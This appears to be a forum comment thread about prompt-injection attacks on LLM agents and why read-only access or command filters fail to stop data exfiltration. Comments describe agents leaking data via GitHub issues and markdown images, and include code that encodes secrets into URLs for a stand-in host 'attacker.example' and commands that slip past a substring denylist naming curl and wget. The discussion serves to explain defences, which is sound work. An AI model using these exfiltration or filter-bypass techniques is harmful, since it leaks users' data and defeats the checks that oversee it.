> as powerless as LLM companies want you to believe.

This comes from first principles; it has nothing to do with any company. This is how LLMs currently work.

Again, you're trying to think about blacklisting/whitelisting, but that also doesn't work, not just in practice, but in a pure theoretical sense. You can have whatever "perfect" ACL-based solution, but if you want useful work with "outside" data, then this exploit is still possible.

This has been shown to work on GitHub. If your LLM touches GitHub issues, it can leak any data it has access to (exfiltrating via GitHub itself, since it has access there).

▲

schmichael 8 hours ago | parent [-]

Fair, I forget how broadly users are willing to give agents permissions. It seems like common sense to me that users disallow writes outside of sandboxes by agents but obviously I am not the norm.

▲

motoxpro 6 hours ago | parent | next [-]

The only way to be 100% sure is to not have it interact with the outside at all. No web searches, no reading documents, no DB reads, no MCP, no external services, etc. Just pure execution of a self-hosted model in a sandbox.

Otherwise you are open to the same injection attacks.

▲

schmichael 2 hours ago | parent [-]

I don't think this is accurate.

Read-only access (web searches, DB, etc.) all seems fine as long as the agent cannot exfiltrate the data as demonstrated in this attack. As I started with: more sophisticated outbound filtering would protect against that.

MCP/tools could be used to the extent you are comfortable with all of the behaviors possible being triggered. For myself, in sandboxes or with readonly access, that means tools can be allowed to run wild. Cleaning up even in the most disastrous of circumstances is not a problem, other than a waste of compute.

▲

lunar_mycroft 41 minutes ago | parent [-]

There is no such thing as read-only network access. For example, you might think that limiting the LLM to making HTTP GET requests would prevent it from exfiltrating data, but there's nothing at all to stop the attacker's server from receiving such data encoded in the URL. Even worse, attackers can exploit this vector to exfiltrate data even without explicit network permissions if the user's client allows things like rendering markdown images.
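
To make the GET-request point concrete, here is a minimal sketch of how data can ride along in a URL. The host `attacker.example`, the `q` parameter, and both function names are made up for illustration; nothing here sends a request, it only builds and parses strings.

```python
import base64
from urllib.parse import urlencode, urlsplit, parse_qs


def build_exfil_url(base_url: str, secret: str) -> str:
    """Pack `secret` into the query string of an ordinary-looking GET URL."""
    token = base64.urlsafe_b64encode(secret.encode()).decode()
    return f"{base_url}?{urlencode({'q': token})}"


def recover_secret(url: str) -> str:
    """What an attacker's server could do with the URL it sees in its logs."""
    token = parse_qs(urlsplit(url).query)["q"][0]
    return base64.urlsafe_b64decode(token.encode()).decode()


# Hypothetical secret and host, for illustration only.
url = build_exfil_url("https://attacker.example/pixel.png", "API_KEY=abc123")

# If the client renders markdown images, merely displaying this string
# causes a GET to the URL, with no explicit network tool involved.
markdown_image = f"![status]({url})"

print(url)
print(recover_secret(url))
```

The "read" and the "write" are the same request here: fetching the URL is what delivers the payload.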

▲

rcxdude 7 hours ago | parent | prev | next [-]

Part of the issue is that reads can exfiltrate data as well (just stuff it into a request URL). You also need to restrict what online information the agent can read, which makes it a lot less useful.

▲

Uehreka 5 hours ago | parent | prev | next [-]

“Disallow writes” isn’t a thing unless you whitelist (not blacklist) what your agent can read (GET requests can be used to write by encoding arbitrary data in URL paths and querystrings).

The problem is, once you “injection-proof” your agent, you’ve also made it “useful proof”.
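
A rough sketch of what whitelisting reads might look like, assuming a hypothetical `ALLOWED_HOSTS` set and a `may_fetch` check that the agent's fetch tool would call before every request (neither comes from any particular agent framework):

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would choose its own hosts.
ALLOWED_HOSTS = {"docs.python.org", "internal-wiki.example"}


def may_fetch(url: str) -> bool:
    """Allow a GET only if the URL's exact hostname is on the allowlist."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


print(may_fetch("https://docs.python.org/3/library/urllib.parse.html"))
print(may_fetch("https://attacker.example/?q=c2VjcmV0"))
# Lookalike and userinfo tricks resolve to a different hostname.
print(may_fetch("https://docs.python.org.attacker.example/"))
print(may_fetch("https://docs.python.org@attacker.example/"))
```

This is where the usefulness trade-off shows up: the check only helps if no allowlisted host will relay data somewhere an attacker can read it, and a host like GitHub (mentioned upthread) fails that test.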

▲

schmichael 2 hours ago | parent [-]

> The problem is, once you “injection-proof” your agent, you’ve also made it “useful proof”.

I find people suggesting this over and over in the thread, and I remain unconvinced. I use LLMs and agents, albeit not as widely as many, and carefully manage their privileges. The most adversarial attack would only waste my time and tokens, not anything I couldn't undo.

I didn't realize I was in such a minority position on this honestly! I'm a bit aghast at the security properties people are readily accepting!

You can generate code, commit to git, run tools and tests, search the web, read from databases, write to dev databases and services, etc etc etc all with the greatest threat being DOS... and even that is limited by the resources you make available to the agent to perform it!

▲

madhadron an hour ago | parent [-]

I'm puzzled by your statement. The activities you're describing have lots of exfiltration routes.

▲

formerly_proven 6 hours ago | parent | prev [-]

Look at the popularity of agentic IDE plugins. Every user of an IDE plugin is doing it wrong. (The permission "systems" built into the agent tools themselves are literal sieves: poorly implemented substring matching on shell commands, with no holistic access mediation.)
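
To illustrate why substring matching on shell commands leaks, here is a toy filter. The `DENIED_SUBSTRINGS` list and `naive_is_allowed` are invented for this sketch and are not taken from any specific plugin; the commands are only checked as strings, never executed.

```python
# Hypothetical denylist of the kind a naive permission check might use.
DENIED_SUBSTRINGS = ["curl", "wget", "rm -rf"]


def naive_is_allowed(command: str) -> bool:
    """Reject a command only if it literally contains a denied substring."""
    return not any(bad in command for bad in DENIED_SUBSTRINGS)


commands = [
    # Caught: contains the literal text "curl".
    "curl https://attacker.example/",
    # Missed: a POSIX shell drops the backslash, so this runs curl.
    "c\\url https://attacker.example/",
    # Missed: command substitution assembles the name "curl" at runtime.
    "$(printf 'cu'; printf 'rl') https://attacker.example/",
    # Missed: a different program makes the same request.
    "python3 -c 'import urllib.request as u; u.urlopen(\"https://attacker.example/\")'",
]

results = [naive_is_allowed(c) for c in commands]
for command, allowed in zip(commands, results):
    print("ALLOW" if allowed else "DENY ", command)
```

Only the first command is denied. The filter inspects text, while the shell interprets it, so anything that changes between those two steps gets through.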